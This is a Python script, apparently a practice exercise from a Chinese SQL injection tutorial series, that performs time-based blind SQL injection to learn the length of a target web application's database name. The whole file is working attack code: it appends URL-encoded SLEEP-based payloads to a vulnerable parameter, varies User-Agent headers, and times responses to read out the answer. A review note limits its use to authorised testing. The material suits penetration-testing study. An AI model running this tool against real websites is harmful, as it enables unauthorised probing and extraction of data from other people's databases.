SQL注入代码实践(盲注-获取数据库名长度【数值型】)

# -*- coding: utf-8 -*-
"""
@Time : 2022/4/4 16:19
@Auth : zhangxiang
@File :GetLength_Inject.py
@IDE :PyCharm
@Motto:ABC(Always Be Coding)

"""
#获取数据库名长度
import random
import re
import sys
import time
from urllib import error
from urllib import parse
from urllib import request

from ua_info import ua_list

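class GetLength_Inject(object):
    """Time-based blind SQL injection probe for the length of ``database()``.

    For each candidate length N in ``1..max_length`` the probe appends
    ``AND IF(LENGTH(database())=N, SLEEP(delay), 1)`` (URL-encoded) directly to
    ``url`` and times the request.  A response that takes longer than ``delay``
    seconds is reported as a hit and N is returned.  ``Str_Start`` terminates
    the statement with a URL-encoded ``#`` (``%23``) after the condition and
    again after the ``submit`` parameter and sends a random User-Agent taken
    from ``ua_list``; ``Num_Start`` appends no terminator and sends one fixed
    User-Agent.  Apart from that the two entry points are identical.

    ``url`` must already end at the injection point (e.g. ``...?id=1``): the
    payload is concatenated onto it without any further encoding.

    NOTE(review): offensive test helper — run it only against systems you are
    authorised to assess.  Timing detection is only as reliable as the network:
    a legitimately slow response longer than ``delay`` seconds is misreported
    as a hit.  Raise ``delay`` (and ``timeout``) on noisy or high-latency links.
    """

    # Injected condition.  ``changeNum`` is replaced by the candidate length and
    # ``changeDelay`` by the configured sleep; with the default delay of 3 the
    # resulting payload is byte-identical to the original hand-written one.
    _JUDGE_TEMPLATE = (
        "%20and%20if((length((select%20database()))=changeNum),sleep(changeDelay),1)"
    )
    # ``&submit=...`` with the value as a hex literal (0x5375626D6974 decodes to
    # the ASCII bytes of "Submit") — presumably so no quote characters are needed.
    _SUBMIT = "&submit=0x5375626D6974"
    # URL-encoded ``#`` (MySQL line comment) used by Str_Start as a terminator.
    _HASH = "%23"
    _FIXED_UA = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0'

    def __init__(self, delay=3, timeout=None, max_length=31):
        """Configure the probe.

        Args:
            delay: seconds passed to ``SLEEP()`` and used as the hit threshold.
            timeout: socket timeout per request in seconds.  Defaults to
                ``5 * delay`` so a genuine hit (>= ``delay`` seconds) is never
                cut off, while a dead target no longer hangs the scan forever
                (the original used ``urlopen`` with no timeout at all).
            max_length: largest length tried, inclusive; 31 matches the
                original ``range(1, 32)``.
        """
        self.delay = delay
        self.timeout = 5 * delay if timeout is None else timeout
        self.max_length = max_length

    def Str_Start(self, StrList, url):
        """Probe ``url`` with ``#``-terminated payloads and a random User-Agent.

        Every probe URL is printed before it is sent.

        Args:
            StrList: unused; kept for call compatibility (the original only
                referenced it from commented-out code).
            url: target URL ending at the injectable parameter value.

        Returns:
            The detected length as an ``int``, or ``None`` when no candidate in
            ``1..max_length`` produced a delay.

        Raises:
            urllib.error.URLError: on connection failure or socket timeout.
                HTTP error statuses (4xx/5xx) are timed like any other response
                and do not abort the scan.
        """
        return self._scan(url, self._HASH, lambda: random.choice(ua_list), echo=True)

    def Num_Start(self, StrList, url):
        """Probe ``url`` with unterminated payloads and a fixed User-Agent.

        Args:
            StrList: unused; kept for call compatibility.
            url: target URL ending at the injectable parameter value.

        Returns:
            The detected length as an ``int``, or ``None`` when no candidate in
            ``1..max_length`` produced a delay.

        Raises:
            urllib.error.URLError: on connection failure or socket timeout.
        """
        return self._scan(url, "", lambda: self._FIXED_UA, echo=False)

    def _scan(self, url, terminator, pick_ua, *, echo):
        """Try each candidate length; return the first one that delays the response.

        ``terminator`` is appended after the condition and after the submit
        parameter; ``pick_ua`` is called once per request for the User-Agent;
        ``echo`` prints each probe URL before it is sent.
        """
        judge = self._JUDGE_TEMPLATE.replace("changeDelay", str(self.delay))
        tail = terminator + self._SUBMIT + terminator
        for num in range(1, self.max_length + 1):
            full_url = url + judge.replace("changeNum", str(num)) + tail
            if echo:
                print(full_url)
            elapsed = self._measure(full_url, {'User-Agent': pick_ua()})
            # SLEEP(delay) guarantees at least ``delay`` seconds, so strict ``>``
            # is the right comparison (same threshold as the original).
            if elapsed > self.delay:
                self._report(num, full_url, elapsed)
                return num
        return None

    def _measure(self, full_url, headers):
        """Return how many seconds ``urlopen`` took to return for ``full_url``.

        Only the time until the response headers arrive is measured (the body
        is never read) — that is where ``SLEEP()`` shows up.  An HTTP error
        status is a completed round trip and is timed like a success instead of
        aborting the scan: the delay, not the status code, is the signal here.
        The response object is always closed.
        """
        req = request.Request(url=full_url, headers=headers)
        # perf_counter is monotonic; wall-clock adjustments cannot skew the interval.
        start = time.perf_counter()
        try:
            with request.urlopen(req, timeout=self.timeout):
                pass
        except error.HTTPError as resp:
            resp.close()
        return time.perf_counter() - start

    @staticmethod
    def _report(num, full_url, elapsed):
        """Print the hit banner with the same text as the original."""
        print("*" * 200)
        print("得到盲注结果,数据库的长度为:" + str(num))
        print("注入的payload:" + full_url)
        print("使用的时间:" + str(elapsed))
        print("*" * 200)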
